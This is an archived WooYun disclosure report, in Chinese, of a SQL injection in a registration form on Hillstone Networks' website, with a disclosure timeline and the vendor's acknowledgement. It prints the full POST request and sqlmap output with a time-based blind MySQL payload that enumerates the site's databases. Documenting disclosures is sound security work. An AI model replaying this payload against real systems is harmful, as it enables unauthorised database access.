山石网科WWW主站存在SQL注入漏洞（可影响2个数据库） | wooyun-2016-0168398

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2016-0168398

漏洞标题：

山石网科WWW主站存在SQL注入漏洞（可影响2个数据库）

漏洞详情

披露状态：

2016-01-08：细节已通知厂商并且等待厂商处理中
2016-01-08：厂商已经确认，细节仅向厂商公开
2016-01-18：细节向核心白帽子及相关领域专家公开
2016-01-28：细节向普通白帽子公开
2016-02-07：细节向实习白帽子公开
2016-02-22：细节向公众公开

简要描述：

看见你们的招聘信息了就好奇的测试了下 ···

详细说明：

POST数据包：

POST /pub/iNGFWtest/register.php HTTP/1.1
Content-Length: 552
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.hillstonenet.com.cn:80/
Cookie: lc8_sid=wzNkuS; PHPSESSID=tnt4a2du63440nmb3fhj9f3hr6; lc8_oldtopics=D2206D1476D907D2274D71D; lc8_visitedfid=43D15D16D17D41; ndIz_2132_saltkey=ozV4Ig0K; ndIz_2132_lastvisit=1452227947; ndIz_2132_sid=Shmv2X; ndIz_2132_lastact=1452231547%09forum.php%09; phpcms_searchtime=1452231547
Host: www.hillstonenet.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
brand%5b%5d=*&company=Acunetix&configable=%e7%86%9f%e7%bb%83&credentiales%5b%5d=CCNA&email=admin@qq.com&environment=%e7%8e%b0%e7%bd%91%e6%b5%81%e9%87%8f%e7%8e%af%e5%a2%83&equipment%5b%5d=%e4%b8%8b%e4%b8%80%e4%bb%a3%e9%98%b2%e7%81%ab%e5%a2%99&experience=1-3&hangye=%e6%94%bf%e5%ba%9c&media%5b%5d=%e6%96%b0%e6%b5%aa%e5%be%ae%e5%8d%9a&renshu=100%e4%ba%ba%e4%bb%a5%e4%b8%8b&shipin=%e6%98%af&tel=555-666-0606&username=admin

第一个参数 brand[] 可注入

基于延时注入太慢了就不跑了 hillstonenet 26张表

漏洞证明：

sqlmap identified the following injection point(s) with a total of 181 HTTP(s) r
equests:
---
Parameter: #1* ((custom) POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: brand[]=(select(0)from(select(sleep(0)))v)/' AND (SELECT * FROM (SE
LECT(SLEEP(5)))OdMr) AND 'HqPD'='HqPD'+(select(0)from(select(sleep(0)))v)+'"+(se
lect(0)from(select(sleep(0)))v)+"/&company=Acunetix&configable=%e7%86%9f%e7%bb%8
3&credentiales[]=CCNA&email=admin@qq.com&environment=%e7%8e%b0%e7%bd%91%e6%b5%81
%e9%87%8f%e7%8e%af%e5%a2%83&equipment[]=%e4%b8%8b%e4%b8%80%e4%bb%a3%e9%98%b2%e7%
81%ab%e5%a2%99&experience=1-3&hangye=%e6%94%bf%e5%ba%9c&media[]=%e6%96%b0%e6%b5%
aa%e5%be%ae%e5%8d%9a&renshu=100%e4%ba%ba%e4%bb%a5%e4%b8%8b&shipin=%e6%98%af&tel=
555-666-0606&username=admin
---
[13:54:09] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5.0.12
[13:54:09] [INFO] fetching database names
[13:54:09] [INFO] fetching number of databases
[13:54:09] [INFO] retrieved:
[13:54:09] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
2
[13:54:22] [INFO] retrieved:
[13:54:27] [INFO] adjusting time delay to 2 seconds due to good response times
information_schema
[13:57:06] [INFO] retrieved: hillstonenet
available databases [2]:
[*] hillstonenet
[*] information_schema
[13:59:06] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\www.hillstonenet.com.cn'
[*] shutting down at 13:59:06

修复方案：

版权声明：转载请注明来源天地不仁以万物为刍狗@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：5

确认时间：2016-01-08 22:42

厂商回复：

谢谢提醒

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源天地不仁以万物为刍狗@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 天地不仁 以万物为刍狗@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

版权声明：转载请注明来源天地不仁以万物为刍狗@乌云